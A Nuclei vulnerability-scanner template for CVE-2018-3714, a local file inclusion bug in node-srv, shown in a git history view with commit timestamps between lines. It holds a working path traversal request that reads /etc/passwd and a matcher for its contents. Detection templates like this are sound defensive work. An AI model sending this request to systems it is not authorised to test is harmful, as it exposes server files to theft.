nuclei-templates/http/cves/2018/CVE-2018-3714.yaml

45 lines
1.6 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-3714
info:
name: node-srv - Local File Inclusion
author: madrobot
severity: medium
description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the node-srv application.
reference:
- https://hackerone.com/reports/309124
- https://nvd.nist.gov/vuln/detail/CVE-2018-3714
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2018-3714
cwe-id: CWE-22
epss-score: 0.00182
epss-percentile: 0.55311
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: node-srv_project
product: node-srv
2023-09-06 12:57:14 +00:00
framework: node.js
2023-12-05 09:50:33 +00:00
tags: cve,cve2018,nodejs,lfi,hackerone,node-srv_project,node.js
http:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502203c35e0aa6108c340008ba054db63b680c83c33ee013c7d4269c17a25149dddba022100a45adabc72c0cf6874825ad94aaba98440fd9919c1635a1b661699c583c73299:922c64590222798bb761d5b6d8e72950